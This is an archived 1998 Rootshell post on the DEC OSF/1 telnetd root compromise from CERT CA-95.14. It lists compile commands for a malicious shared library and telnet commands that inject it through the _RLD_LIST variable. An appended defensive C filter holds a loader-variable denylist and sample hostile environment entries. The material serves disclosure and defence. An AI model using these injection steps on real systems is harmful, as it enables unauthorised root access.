[ http://www.rootshell.com/ ]

From mc6448@mclink.it Mon Mar 16 11:36:47 1998
Date: Mon, 16 Mar 1998 20:26:05 +0100 (MET)
From: Paolo Rocchi
To: info@rootshell.com
Subject: OSF/1 libroot

I'm referring to CERT Advisory CA-95.14 (original issue date: 11/1/95), concerning the notorious "Telnetd Environment Vulnerability". As I never saw detailed information regarding Digital's OSF/1 vulnerability, here it is.

The telnetd daemon installed under DEC OSF/1 (V2.0 through V3.2c) is vulnerable to a local root compromise and, if the user is "able to deposit an altered shared object library onto the targeted system", to a remote root compromise. Example code has been made publicly available for various operating systems. Starting from those sources it is possible to obtain super-user privileges by exploiting a particular environment variable.

Details follow:

file.c -> shared object source code (based upon existing examples)

To build the library under DEC OSF/1 V3.2:

    cc -c file.c
    ld -shared -no_archive -o file.so -set_version osf.1 file.o -lc

    telnet> env def _RLD_LIST /tmp/file.so:DEFAULT
    telnet> env exp _RLD_LIST
    telnet> o localhost

Solution: See the above-mentioned CERT advisory.

Regards.
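The message above shows the attack side: the telnet client exports a loader-control variable (_RLD_LIST) through the ENVIRON negotiation, and the privileged login process on the server honours it and maps an attacker-supplied shared object. The defensive counterpart, which is what the vendor patches referenced by CA-95.14 implement, is for telnetd to discard any client-supplied variable that steers the run-time linker before it spawns login. The following C code is an added example of such a filter; it is not part of the original post and not Digital's patch. The prefix table (LD_, _RLD_, LIBPATH, SHLIB_PATH), the function names `is_loader_var` and `filter_env`, and the sample environment are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Variable-name prefixes that steer the run-time loader on the Unix
 * flavours covered by CA-95.14.  A privileged login process must never
 * inherit any of these from an untrusted telnet ENVIRON negotiation.
 * This table is an assumption for the example; a production filter
 * should follow the platform vendor's patch.
 */
static const char *const loader_prefixes[] = {
    "LD_",        /* LD_PRELOAD, LD_LIBRARY_PATH (SunOS, Solaris, Linux) */
    "_RLD_",      /* _RLD_LIST, _RLD_ROOT (DEC OSF/1, IRIX) */
    "LIBPATH",    /* AIX */
    "SHLIB_PATH", /* HP-UX */
};

/* Return 1 if entry ("NAME=VALUE" or a bare "NAME") names a loader-control
 * variable, 0 otherwise.  Only the part before '=' is compared, so a value
 * that merely contains "LD_" does not match, and "LDAP_..." is not "LD_". */
int is_loader_var(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t namelen = eq ? (size_t)(eq - entry) : strlen(entry);
    size_t i;

    for (i = 0; i < sizeof loader_prefixes / sizeof loader_prefixes[0]; i++) {
        size_t plen = strlen(loader_prefixes[i]);
        if (namelen >= plen && strncmp(entry, loader_prefixes[i], plen) == 0)
            return 1;
    }
    return 0;
}

/* Drop every loader-control entry from env[0..n) in place, preserving the
 * order of the survivors.  Returns the number of entries kept.  When at
 * least one entry was removed, the slot after the last survivor is set to
 * NULL so the array can be handed to execve() directly. */
size_t filter_env(const char **env, size_t n)
{
    size_t kept = 0, i;

    for (i = 0; i < n; i++) {
        if (is_loader_var(env[i]))
            continue;           /* discard: client must not control the loader */
        env[kept++] = env[i];
    }
    if (kept < n)
        env[kept] = NULL;       /* slot exists because kept < n */
    return kept;
}

int main(void)
{
    /* Constructed sample of what a client could send via "env def"/"env exp". */
    const char *env[] = {
        "TERM=vt100",
        "_RLD_LIST=/tmp/file.so:DEFAULT",
        "HOME=/home/guest",
        "LD_PRELOAD=/tmp/evil.so",
        "LDAP_SERVER=ldap.example",   /* starts with "LD" but not "LD_": kept */
        NULL,
    };
    size_t n = filter_env(env, 5), i;

    printf("%zu entries kept:\n", n);
    for (i = 0; i < n; i++)
        printf("  %s\n", env[i]);
    return 0;
}
```

A denylist like this is the minimum; telnetd implementations patched after CA-95.14 went further and restricted which ENVIRON variables are accepted at all, and a modern setuid-aware loader additionally ignores these variables when the effective and real UIDs differ. Both layers are worth having, because the filter only helps if it runs in every code path that builds the environment for login.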